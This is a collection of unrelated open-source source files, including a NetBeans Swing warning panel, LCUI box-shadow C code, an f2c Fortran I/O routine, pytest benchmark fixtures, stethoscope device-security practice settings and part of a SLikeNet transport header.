m_pMinCornerDataPointer + (1 + m_maxCorner.m_line - m_minCorner.m_line) * m_depth * m_width);
}
} // namespace bcd
| 10,648 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.php.project.connections.ftp;
import java.awt.Cursor;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.net.MalformedURLException;
import java.net.URL;
import javax.swing.GroupLayout;
import javax.swing.GroupLayout.Alignment;
import javax.swing.JCheckBox;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTextPane;
import javax.swing.LayoutStyle.ComponentPlacement;
import javax.swing.UIManager;
import org.openide.DialogDisplayer;
import org.openide.NotifyDescriptor;
import org.openide.awt.HtmlBrowser;
import org.openide.awt.Mnemonics;
import org.openide.util.Exceptions;
import org.openide.util.NbBundle;
import org.openide.util.Utilities;
/**
* Warning about a firewall issue on Windows with JDK 7; see issue #202021.
*/
public final class WindowsJdk7WarningPanel extends JPanel {
private static final long serialVersionUID = 54654646872L;
private static final boolean IS_WINDOWS = Utilities.isWindows();
private static final boolean IS_JDK7 = System.getProperty("java.version").startsWith("1.7."); // NOI18N
private static volatile Boolean windowsJdk7Warning;
private WindowsJdk7WarningPanel() {
initComponents();
}
/**
* Possibly open warning dialog.
*/
public static void warn() {
if (!showWindowsJdk7Warning()) {
return;
}
WindowsJdk7WarningPanel panel = new WindowsJdk7WarningPanel();
NotifyDescriptor descriptor = new NotifyDescriptor.Message(panel, NotifyDescriptor.WARNING_MESSAGE);
DialogDisplayer.getDefault().notify(descriptor);
if (panel.doNotShowAgainCheckBox.isSelected()) {
hideWindowsJdk7Warning();
}
}
private static boolean showWindowsJdk7Warning() {
if (windowsJdk7Warning == null) {
windowsJdk7Warning = IS_WINDOWS && IS_JDK7 && FtpPreferences.getInstance().getWindowsJdk7Warning();
}
return windowsJdk7Warning;
}
private static void hideWindowsJdk7Warning() {
windowsJdk7Warning = false;
FtpPreferences.getInstance().setWindowsJdk7Warning(false);
}
/** This method is called from within the constructor to
* initialize the form.
* WARNING: Do NOT modify this code. The content of this method is
* always regenerated by the Form Editor.
*/
@SuppressWarnings("unchecked")
// <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
private void initComponents() {
infoLabel = new JLabel();
issueLinkLabel = new JLabel();
doNotShowAgainCheckBox = new JCheckBox();
infoScrollPane = new JScrollPane();
infoTextPane = new JTextPane();
Mnemonics.setLocalizedText(infoLabel, NbBundle.getMessage(WindowsJdk7WarningPanel.class, "WindowsJdk7WarningPanel.infoLabel.text")); // NOI18N
Mnemonics.setLocalizedText(issueLinkLabel, NbBundle.getMessage(WindowsJdk7WarningPanel.class, "WindowsJdk7WarningPanel.issueLinkLabel.text"));
issueLinkLabel.addMouseListener(new MouseAdapter() {
public void mouseEntered(MouseEvent evt) {
issueLinkLabelMouseEntered(evt);
}
public void mousePressed(MouseEvent evt) {
issueLinkLabelMousePressed(evt);
}
});
Mnemonics.setLocalizedText(doNotShowAgainCheckBox, NbBundle.getMessage(WindowsJdk7WarningPanel.class, "WindowsJdk7WarningPanel.doNotShowAgainCheckBox.text"));
infoScrollPane.setBorder(null);
infoTextPane.setBackground(UIManager.getDefaults().getColor("Label.background"));
infoTextPane.setBorder(null);
infoTextPane.setEditable(false);
infoTextPane.setText(NbBundle.getMessage(WindowsJdk7WarningPanel.class, "TXT_WinJdk7FtpWarning")); // NOI18N
infoScrollPane.setViewportView(infoTextPane);
GroupLayout layout = new GroupLayout(this);
this.setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(Alignment.LEADING)
.addGroup(layout.createSequentialGroup()
.addGroup(layout.createParallelGroup(Alignment.LEADING)
.addComponent(infoLabel)
.addComponent(doNotShowAgainCheckBox))
.addContainerGap(116, Short.MAX_VALUE))
.addComponent(infoScrollPane, GroupLayout.DEFAULT_SIZE, 358, Short.MAX_VALUE)
.addGroup(layout.createSequentialGroup()
.addComponent(issueLinkLabel, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addContainerGap())
);
layout.setVerticalGroup(
layout.createParallelGroup(Alignment.LEADING)
.addGroup(layout.createSequentialGroup()
.addComponent(infoLabel)
.addPreferredGap(ComponentPlacement.RELATED)
.addComponent(infoScrollPane, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addPreferredGap(ComponentPlacement.UNRELATED)
.addComponent(issueLinkLabel, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addPreferredGap(ComponentPlacement.RELATED, 16, Short.MAX_VALUE)
.addComponent(doNotShowAgainCheckBox))
);
}// </editor-fold>//GEN-END:initComponents
private void issueLinkLabelMouseEntered(MouseEvent evt) {//GEN-FIRST:event_issueLinkLabelMouseEntered
evt.getComponent().setCursor(Cursor.getPredefinedCursor(Cursor.HAND_CURSOR));
}//GEN-LAST:event_issueLinkLabelMouseEntered
private void issueLinkLabelMousePressed(MouseEvent evt) {//GEN-FIRST:event_issueLinkLabelMousePressed
try {
URL url = new URL("http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=7077696"); // NOI18N
HtmlBrowser.URLDisplayer.getDefault().showURL(url);
} catch (MalformedURLException ex) {
Exceptions.printStackTrace(ex);
}
}//GEN-LAST:event_issueLinkLabelMousePressed
// Variables declaration - do not modify//GEN-BEGIN:variables
private JCheckBox doNotShowAgainCheckBox;
private JLabel infoLabel;
private JScrollPane infoScrollPane;
private JTextPane infoTextPane;
private JLabel issueLinkLabel;
// End of variables declaration//GEN-END:variables
}
| 2,791 |
3,969 | /*
* widget_shadow.c -- widget shadow style processing module.
*
* Copyright (c) 2018-2020, <NAME> <<EMAIL>> All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of LCUI nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <string.h>
#include <LCUI_Build.h>
#include <LCUI/LCUI.h>
#include <LCUI/gui/metrics.h>
#include <LCUI/gui/widget.h>
#include <LCUI/draw/boxshadow.h>
#include "widget_shadow.h"
static float ComputeXMetric(LCUI_Widget w, LCUI_Style s)
{
if (s->type == LCUI_STYPE_SCALE) {
return w->width * s->scale;
}
return LCUIMetrics_Compute(s->value, s->type);
}
static float ComputeYMetric(LCUI_Widget w, LCUI_Style s)
{
if (s->type == LCUI_STYPE_SCALE) {
return w->height * s->scale;
}
return LCUIMetrics_Compute(s->value, s->type);
}
void Widget_ComputeBoxShadowStyle(LCUI_Widget w)
{
int key;
LCUI_Style s;
LCUI_BoxShadowStyle *sd;
sd = &w->computed_style.shadow;
memset(sd, 0, sizeof(LCUI_BoxShadowStyle));
for (key = key_box_shadow_start; key <= key_box_shadow_end; ++key) {
s = &w->style->sheet[key];
if (!s->is_valid) {
continue;
}
switch (key) {
case key_box_shadow_x:
sd->x = ComputeXMetric(w, s);
break;
case key_box_shadow_y:
sd->y = ComputeYMetric(w, s);
break;
case key_box_shadow_spread:
sd->spread = LCUIMetrics_Compute(s->value, s->type);
break;
case key_box_shadow_blur:
sd->blur = LCUIMetrics_Compute(s->value, s->type);
break;
case key_box_shadow_color:
sd->color = s->color;
break;
default:
break;
}
}
}
float Widget_GetBoxShadowOffsetX(LCUI_Widget w)
{
const LCUI_BoxShadowStyle *shadow;
shadow = &w->computed_style.shadow;
if (shadow->x >= SHADOW_WIDTH(shadow)) {
return 0;
}
return SHADOW_WIDTH(shadow) - shadow->x;
}
float Widget_GetBoxShadowOffsetY(LCUI_Widget w)
{
const LCUI_BoxShadowStyle *shadow;
shadow = &w->computed_style.shadow;
if (shadow->y >= SHADOW_WIDTH(shadow)) {
return 0;
}
return SHADOW_WIDTH(shadow) - shadow->y;
}
float Widget_GetCanvasWidth(LCUI_Widget widget)
{
float width;
const LCUI_BoxShadowStyle *shadow;
width = widget->box.border.width;
shadow = &widget->computed_style.shadow;
if (shadow->x >= SHADOW_WIDTH(shadow)) {
return width + SHADOW_WIDTH(shadow) + shadow->x;
} else if (shadow->x <= -SHADOW_WIDTH(shadow)) {
return width + SHADOW_WIDTH(shadow) - shadow->x;
}
return width + SHADOW_WIDTH(shadow) * 2;
}
float Widget_GetCanvasHeight(LCUI_Widget widget)
{
float height;
const LCUI_BoxShadowStyle *shadow;
height = widget->box.border.height;
shadow = &widget->computed_style.shadow;
if (shadow->y >= SHADOW_WIDTH(shadow)) {
return height + SHADOW_WIDTH(shadow) + shadow->y;
} else if (shadow->y <= -SHADOW_WIDTH(shadow)) {
return height + SHADOW_WIDTH(shadow) - shadow->y;
}
return height + SHADOW_WIDTH(shadow) * 2;
}
#define ComputeActual(X) LCUIMetrics_ComputeActual(X, LCUI_STYPE_PX)
void Widget_ComputeBoxShadow(LCUI_Widget w, LCUI_BoxShadow *out)
{
LCUI_BoxShadowStyle *s;
LCUI_BorderStyle *b;
b = &w->computed_style.border;
s = &w->computed_style.shadow;
out->x = ComputeActual(s->x);
out->y = ComputeActual(s->y);
out->blur = ComputeActual(s->blur);
out->spread = ComputeActual(s->spread);
out->color = s->color;
out->top_left_radius = ComputeActual(b->top_left_radius);
out->top_right_radius = ComputeActual(b->top_right_radius);
out->bottom_left_radius = ComputeActual(b->bottom_left_radius);
out->bottom_right_radius = ComputeActual(b->bottom_right_radius);
}
void Widget_PaintBoxShadow(LCUI_Widget w, LCUI_PaintContext paint,
LCUI_WidgetActualStyle style)
{
LCUI_Rect box;
box.x = box.y = 0;
box.width = style->canvas_box.width;
box.height = style->canvas_box.height;
BoxShadow_Paint(&style->shadow, &box, style->border_box.width,
style->border_box.height, paint);
}
| 1,996 |
2,542 | <filename>src/prod/src/Reliability/Failover/ra/ReplicaProxyStates.cpp
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#include "Ra.Stdafx.h"
using namespace Common;
namespace Reliability
{
namespace ReconfigurationAgentComponent
{
namespace ReplicaProxyStates
{
ENUM_STRUCTURED_TRACE(ReplicaProxyStates, Ready, LastValidEnum);
void WriteToTextWriter(TextWriter & w, Enum const & val)
{
switch (val)
{
case Ready:
w << L"RD"; return;
case InBuild:
w << L"IB"; return;
case InDrop:
w << L"ID"; return;
case Dropped:
w << L"DD"; return;
default:
Assert::CodingError("Unknown Replica Proxy State");
}
}
}
}
}
| 580 |
945 | <reponame>arobert01/ITK
#include "v3p_f2c.h"
#include "fio.h"
#ifdef __cplusplus
extern "C" {
#endif
uiolen f__reclen;
int
#ifdef KR_headers
do_us(number,ptr,len) ftnint *number; char *ptr; ftnlen len;
#else
do_us(ftnint *number, char *ptr, ftnlen len)
#endif
{
if(f__reading)
{
f__recpos += (int)(*number * len);
if(f__recpos>f__reclen)
err(f__elist->cierr, 110, "do_us");
if (fread(ptr,(int)len,(int)(*number),f__cf) != *number)
err(f__elist->ciend, EOF, "do_us");
return(0);
}
else
{
f__reclen += *number * len;
(void) fwrite(ptr,(int)len,(int)(*number),f__cf);
return(0);
}
}
#ifdef KR_headers
integer do_ud(number,ptr,len) ftnint *number; char *ptr; ftnlen len;
#else
integer do_ud(ftnint *number, char *ptr, ftnlen len)
#endif
{
f__recpos += (int)(*number * len);
if(f__recpos > f__curunit->url && f__curunit->url!=1)
err(f__elist->cierr,110,"do_ud");
if(f__reading)
{
#ifdef Pad_UDread
#ifdef KR_headers
int i;
#else
size_t i;
#endif
if (!(i = fread(ptr,(int)len,(int)(*number),f__cf))
&& !(f__recpos - *number*len))
err(f__elist->cierr,EOF,"do_ud")
if (i < *number)
memset(ptr + i*len, 0, (*number - i)*len);
return 0;
#else
if(fread(ptr,(int)len,(int)(*number),f__cf) != *number)
err(f__elist->cierr,EOF,"do_ud")
else return(0);
#endif
}
(void) fwrite(ptr,(int)len,(int)(*number),f__cf);
return(0);
}
#ifdef KR_headers
integer do_uio(number,ptr,len) ftnint *number; char *ptr; ftnlen len;
#else
integer do_uio(ftnint *number, char *ptr, ftnlen len)
#endif
{
if(f__sequential)
return(do_us(number,ptr,len));
else return(do_ud(number,ptr,len));
}
#ifdef __cplusplus
}
#endif
| 1,199 |
403 | <filename>craft-atom-protocol-http/src/main/java/io/craft/atom/protocol/http/model/HttpRequestLine.java
package io.craft.atom.protocol.http.model;
import static io.craft.atom.protocol.http.HttpConstants.S_CR;
import static io.craft.atom.protocol.http.HttpConstants.S_LF;
import static io.craft.atom.protocol.http.HttpConstants.S_SP;
import lombok.Getter;
import lombok.Setter;
import lombok.ToString;
/**
* The Request-Line begins with a method token, followed by the Request-URI and the protocol version,
* and ending with CRLF. The elements are separated by SP characters. <br>
* No CR or LF is allowed except in the final CRLF sequence.
*
* <pre>
* Request-Line = Method SP Request-URI SP HTTP-Version CRLF
* </pre>
*
* @author mindwind
* @version 1.0, Feb 1, 2013
* @see HttpRequest
*/
@ToString(callSuper = true, of = { "method", "uri" })
public class HttpRequestLine extends HttpStartLine {
private static final long serialVersionUID = 1393510808581169505L;
@Getter @Setter private HttpMethod method;
@Getter @Setter private String uri ;
// ~ ------------------------------------------------------------------------------------------------------------
public HttpRequestLine() {
super();
}
public HttpRequestLine(HttpMethod method, String uri, HttpVersion version) {
super(version);
this.method = method;
this.uri = uri;
}
// ~ ------------------------------------------------------------------------------------------------------------
public String toHttpString() {
StringBuilder sb = new StringBuilder();
sb.append(getMethod()).append(S_SP).append(getUri()).append(S_SP).append(getVersion().getValue()).append(S_CR).append(S_LF);
return sb.toString();
}
}
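// Illustrative usage sketch (the constant names HttpMethod.GET and HttpVersion.HTTP_1_1 are
// assumptions, not verified against this library): the request line built by
// new HttpRequestLine(HttpMethod.GET, "/index.html", HttpVersion.HTTP_1_1).toHttpString()
// would yield the wire form "GET /index.html HTTP/1.1\r\n", i.e. Method SP Request-URI SP
// HTTP-Version CRLF as described in the class Javadoc above.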
| 552 |
482 | <reponame>lifecontrol/cattle
from common_fixtures import * # NOQA
from copy import deepcopy
def made_log(object, admin_user_client, context, accountId=None):
t = object.type
if t == 'stack':
t = 'stack'
logs = admin_user_client.list_audit_log(resourceId=object.id,
resourceType=t)
assert len(logs) == 1
assert logs[0].resourceType == t
if str(logs[0].resourceId) != object.id:
assert str(logs[0].resourceId).replace('1s', '1e') == object.id
else:
assert str(logs[0].resourceId) == object.id
if accountId is None:
assert logs[0].accountId == context.project.id
else:
assert logs[0].accountId == accountId
assert logs[0].authenticatedAsAccountId == context.account.id
def test_audit_entry_created(new_context, admin_user_client):
objects = []
new_headers = deepcopy(new_context.user_client._headers)
new_headers['X-API-Project-Id'] = new_context.project.id
made_log(new_context.user_client.create_project(), admin_user_client,
new_context, accountId=new_context.account.id)
new_context.user_client._headers = new_headers
new_context.user_client.reload_schema()
objects.append(new_context.user_client.create_container(
imageUuid=new_context.image_uuid))
objects.append(new_context.user_client.create_container(
imageUuid=new_context.image_uuid))
objects.append(new_context.user_client.create_api_key())
objects.append(new_context.user_client.create_registry(
serverAddress='test.io', name='test'))
objects.append(new_context.user_client.create_api_key())
objects.append(new_context.user_client.create_stack(
name='env-' + random_str()))
for object in objects:
made_log(object, admin_user_client, new_context)
| 754 |
476 | <filename>microbench/conftest.py
import re
import time
from collections import defaultdict
import pytest
import _valgrind
class Timer:
def __init__(self, nodeid):
self.nodeid = nodeid
self.start = None
self.stop = None
def __enter__(self):
if self.start is not None:
raise ValueError('You cannot use "with timer:" more than once')
_valgrind.lib.callgrind_start()
self.start = time.time()
def __exit__(self, etype, evalue, tb):
self.stop = time.time()
_valgrind.lib.callgrind_stop()
def __str__(self):
if self.start is None:
return '[NO TIMING]'
if self.stop is None:
return '[IN-PROGRESS]'
usec = (self.stop - self.start) * 1000
return f'{usec:.2f} us'
@property
def elapsed(self):
if self.start is not None and self.stop is not None:
return self.stop - self.start
return None
class TimerSession:
NODEID = re.compile(r'(.*)\[(.*)\]')
def __init__(self):
self.apis = set() # ['cpy', 'hpy', ...]
self.table = defaultdict(dict) # {shortid: {api: timer}}
self.timers = {} # nodeid -> Timer
def new_timer(self, nodeid):
shortid, api = self.split_nodeid(nodeid)
timer = Timer(nodeid)
self.apis.add(api)
self.table[shortid][api] = timer
self.timers[nodeid] = timer
return timer
def get_timer(self, nodeid):
return self.timers.get(nodeid)
def split_nodeid(self, nodeid):
shortid = '::'.join(nodeid.split('::')[-2:]) # take only class::function
m = self.NODEID.match(shortid)
if not m:
return shortid, ''
return m.group(1), m.group(2)
def format_ratio(self, reference, value):
if reference and reference.elapsed and value and value.elapsed:
ratio = value.elapsed / reference.elapsed
return f'[{ratio:.2f}]'
return ''
def display_summary(self, tr):
w = tr.write_line
w('')
tr.write_sep('=', 'BENCHMARKS', cyan=True)
w(' '*40 + ' cpy hpy')
w(' '*40 + '---------------- -------------------')
for shortid, timings in self.table.items():
cpy = timings.get('cpy')
hpy = timings.get('hpy')
hpy_ratio = self.format_ratio(cpy, hpy)
cpy = cpy or ''
hpy = hpy or ''
w(f'{shortid:<40} {cpy!s:>15} {hpy!s:>15} {hpy_ratio}')
w('')
@pytest.fixture
def timer(request, api):
nodeid = request.node.nodeid
return request.config._timersession.new_timer(nodeid)
def pytest_configure(config):
config._timersession = TimerSession()
config.addinivalue_line("markers", "hpy: mark modules using the HPy API")
config.addinivalue_line("markers", "cpy: mark modules using the old Python/C API")
def pytest_addoption(parser):
parser.addoption(
"--fast", action="store_true", default=False, help="run microbench faster"
)
parser.addoption(
"--slow", action="store_true", default=False, help="run microbench slower"
)
VERBOSE_TEST_NAME_LENGTH = 90
@pytest.hookimpl(hookwrapper=True)
def pytest_report_teststatus(report, config):
outcome = yield
category, letter, word = outcome.get_result()
timer = config._timersession.get_timer(report.nodeid)
if category == 'passed' and timer:
L = VERBOSE_TEST_NAME_LENGTH - len(report.nodeid)
word = str(timer).rjust(L)
markup = None
if timer.elapsed is None:
markup = {'yellow': True}
outcome.force_result((category, letter, (word, markup)))
def pytest_terminal_summary(terminalreporter, config):
config._timersession.display_summary(terminalreporter)
| 1,741 |
12,940 | <reponame>dciborow/azure-quickstart-templates
{
"$schema": "https://aka.ms/azure-quickstart-templates-metadata-schema#",
"type": "QuickStart",
"itemDisplayName": "Provision a Mobile App with a SQL Database",
"description": "This template provisions a Mobile App, SQL Database, and Notification Hub. It configures a connection string in the mobile app for the database and notification hub.",
"summary": "Provision a Mobile App with a SQL Database",
"githubUsername": "mattchenderson",
"dateUpdated": "2021-05-11"
} | 158 |
2,338 | //===-- Implementation header for isalnum -------------------------*-C++-*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_LIBC_SRC_CTYPE_ISALNUM_H
#define LLVM_LIBC_SRC_CTYPE_ISALNUM_H
namespace __llvm_libc {
int isalnum(int c);
} // namespace __llvm_libc
#endif // LLVM_LIBC_SRC_CTYPE_ISALNUM_H
| 197 |
1,865 | <filename>stethoscope/api/defaults.py
# vim: set fileencoding=utf-8 :
from __future__ import absolute_import, print_function, unicode_literals
import os
import stethoscope.utils
LOGFILE = os.environ.get('STETHOSCOPE_API_LOGFILE', os.environ.get('LOGFILE', 'api.log'))
LOGBOOK = stethoscope.utils.setup_logbook(LOGFILE, logfile_kwargs={'delay': True})
DEBUG = True
TESTING = True
JWT_ALGORITHM = 'HS256'
JWT_EXPIRATION_DELTA = 60 * 60 * 24
def IS_PRIVILEGED_USER(userinfo):
return userinfo['sub'] == '*'
MOBILE_PLATFORMS = ['Android', 'iOS']
NONMOBILE_PLATFORMS = ['Mac', 'Windows']
PRACTICES = {
'jailed': {
'KEY': 'jailed',
'DISPLAY_TITLE': 'Verified Operating System',
'DESCRIPTION': (
"Modifying the basic operating system (known as \"jailbreaking\" or \"rooting\") "
"of a device increases the risk of infection or compromise by exposing additional "
"security vulnerabilities."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
'NA_PLATFORMS': NONMOBILE_PLATFORMS,
},
'encryption': {
'KEY': 'encryption',
'DISPLAY_TITLE': 'Disk Encryption',
'DESCRIPTION': (
"Full-disk encryption protects data at rest from being accessed by a "
"party who does not know the password or decryption key."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
'PLATFORM_REQUIRED': True,
},
'uptodate': {
'KEY': 'uptodate',
'DISPLAY_TITLE': 'Up-to-date',
'DESCRIPTION': (
"One of the most important things you can do to secure your device(s) is to "
"keep your operating system and software up to date. New vulnerabilities and "
"weaknesses are found every day, so frequent updates are essential to ensuring "
"your device(s) include the latest fixes and preventative measures."
),
'LINK': '#',
'REQUIRED_VERSIONS': {
'Mac OS X': '10.11.0',
'iOS': '9.3.5',
'Android': '6.0.0',
},
'RECOMMENDED_VERSIONS': {
'Mac OS X': '10.11.6',
'iOS': '9.3.5',
'Android': '6.0.1',
}
},
'autoupdate': {
'KEY': 'autoupdate',
'DISPLAY_TITLE': 'Automatic Updates',
'DESCRIPTION': (
"One of the most important things you can do to secure your device(s) is to "
"keep your operating system and software up to date. New vulnerabilities and "
"weaknesses are found every day, so frequent updates are essential to ensuring "
"your device(s) include the latest fixes and preventative measures. "
"Enabling automatic updating helps ensure your machine is up-to-date without "
"having to manually install updates."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'firewall': {
'KEY': 'firewall',
'DISPLAY_TITLE': 'Firewall',
'DESCRIPTION': (
"Firewalls control network traffic into and out of a system. Enabling the firewall on "
"your device can prevent network-based attacks on your system, and is especially "
"important if you make use of insecure wireless networks (such as at coffee shops and "
"airports)."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'remotelogin': {
'KEY': 'remotelogin',
'DISPLAY_TITLE': 'Remote Login Disabled',
'DESCRIPTION': (
"The 'Remote Login' setting on your Mac controls whether users can login remotely "
"to the system using SSH. If you don't know what this is or why you would want it, "
"you should disable 'Remote Login'."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS + ["Windows"],
},
'screenlock': {
'KEY': 'screenlock',
'DISPLAY_TITLE': 'Screen Lock',
'DESCRIPTION': (
"Screen locks, or screen saver locks, prevent unauthorized third-parties from "
"accessing your laptop when unattended by requiring a password to dismiss the screen "
"saver or wake from \"sleep\" mode. Setting the timeout, i.e., the length of idle "
"time before the screen saver takes effect, to 10 minutes or less is also recommended."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
},
'sentinel': {
'KEY': 'sentinel',
'SOFTWARE_NAMES': ['Sentinel Agent'],
'SERVICE_NAMES': ['com.sentinelone.sentineld'],
'DISPLAY_TITLE': 'SentinelOne',
'DESCRIPTION': (
"SentinelOne is part of our approach to preventing and detecting malware "
"infections. Installing SentinelOne helps protect your system and helps us detect "
"when a system has been compromised, and how, so we can respond quickly and "
"effectively."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'carbonblack': {
'KEY': 'carbonblack',
'SOFTWARE_NAMES': ['Carbon Black Sensor'],
'SERVICE_NAMES': ['com.carbonblack.daemon'],
'DISPLAY_TITLE': 'Carbon Black',
'DESCRIPTION': (
"Carbon Black is part of our approach to preventing and detecting malware "
"infections. Installing Carbon Black helps protect your system and helps us "
"detect when a system has been compromised, and how, so we can respond quickly and "
"effectively."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'unknownsources': {
'KEY': 'unknownsources',
'DISPLAY_TITLE': 'Unknown Sources Disabled',
'DESCRIPTION': (
"Apps from unknown sources are more likely to contain malware than apps "
"downloaded from the Play Store. Keeping this setting disabled prevents "
"the installation of these apps."
),
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': ['iOS'] + NONMOBILE_PLATFORMS,
},
'adbstatus': {
'KEY': 'adbstatus',
'DISPLAY_TITLE': 'Android Debug Bridge Disabled',
'DESCRIPTION': (
"The Android Debug Bridge (ADB) is a debugging tool intended for use by Android developers. "
"Enabling ADB provides enhanced access to a device via both USB and wireless interfaces, "
"which presents a security risk (one that has been exploited in the past)."
),
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': ['iOS'] + NONMOBILE_PLATFORMS,
},
}
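# A hedged sketch of how these settings might be consumed (kept commented out
# so it has no effect on this settings module; the helper below is illustrative
# and not part of stethoscope itself):
#
# MOBILE_PRACTICES = [
#     key for key, config in PRACTICES.items()
#     if not set(MOBILE_PLATFORMS) <= set(config.get('NA_PLATFORMS', []))
# ]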
| 2,369 |
4,098 | <filename>Source/ThirdParty/SLikeNet/Source/include/slikenet/transport2.h
/*
* Original work: Copyright (c) 2014, Oculus VR, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* RakNet License.txt file in the licenses directory of this source tree. An additional grant
* of patent rights can be found in the RakNet Patents.txt file in the same directory.
*
*
* Modified work: Copyright (c) 2017, SLikeSoft UG (haftungsbeschränkt)
*
* This source code was modified by SLikeSoft. Modifications are licensed under the MIT-style
* license found in the license.txt file in the root directory of this source tree.
*/
/// \file
/// \brief Contains RakNetTransportCommandParser and RakNetTransport used to provide a secure console connection.
///
#include "NativeFeatureIncludes.h"
#if _RAKNET_SUPPORT_TelnetTransport==1
#ifndef __RAKNET_TRANSPORT_2
#define __RAKNET_TRANSPORT_2
#include "TransportInterface.h"
#include "DS_Queue.h"
#include "CommandParserInterface.h"
#include "PluginInterface2.h"
#include "Export.h"
namespace SLNet
{
/// Forward declarations
class BitStream;
class RakPeerInterface;
class RakNetTransport;
/// \defgroup RAKNET_TRANSPORT_GROUP RakNetTransport
/// \brief UDP based transport implementation for the ConsoleServer
/// \details
/// \ingroup PLUGINS_GROUP
/// \brief Use RakNetTransport if you need a secure connection between the client and the console server.
/// \details RakNetTransport automatically initializes security for the system. Use the project CommandConsoleClient to connect
/// to the ConsoleServer if you use RakNetTransport.
/// \ingroup RAKNET_TRANSPORT_GROUP
class RAK_DLL_EXPORT RakNetTransport2 : public TransportInterface, public PluginInterface2
{
public:
// GetInstance() and DestroyInstance(instance*)
STATIC_FACTORY_DECLARATIONS(RakNetTransport2)
RakNetTransport2();
virtual ~RakNetTransport2();
/// Start the transport provider on the indicated port.
/// \param[in] port The port to start the transport provider on
/// \param[in] serverMode If true, you should allow incoming connections (I don't actually use this anywhere)
/// \return Return true on success, false on failure.
bool Start(unsigned short port, bool serverMode);
/// Stop the transport provider. You can clear memory and shutdown threads here.
void Stop(void);
/// Send a null-terminated string to \a systemAddress
/// If your transport method requires particular formatting of the outgoing data (e.g. you don't just send strings) you can do it here
/// and parse it out in Receive().
/// \param[in] systemAddress The player to send the string to
/// \param[in] data format specifier - same as RAKNET_DEBUG_PRINTF
/// \param[in] ... format specification arguments - same as RAKNET_DEBUG_PRINTF
void Send( SystemAddress systemAddress, const char *data, ... );
/// Disconnect \a systemAddress . The binary address and port defines the SystemAddress structure.
/// \param[in] systemAddress The player/address to disconnect
void CloseConnection( SystemAddress systemAddress );
/// Return a string. The string should be allocated and written to Packet::data .
/// The byte length should be written to Packet::length . The player/address should be written to Packet::systemAddress
/// If your transport protocol adds special formatting to the data stream you should parse it out before returning it in the packet
/// and thus only return a string in Packet::data
/// \return The packet structure containing the result of Receive, or 0 if no data is available
Packet* Receive( void );
/// Deallocate the Packet structure returned by Receive
	/// \param[in] packet The packet to deallocate
void DeallocatePacket( Packet *packet );
/// If a new system connects to you, you should queue that event and return the systemAddress/address of that player in this function.
/// \return The SystemAddress/address of the system
SystemAddress HasNewIncomingConnection(void);
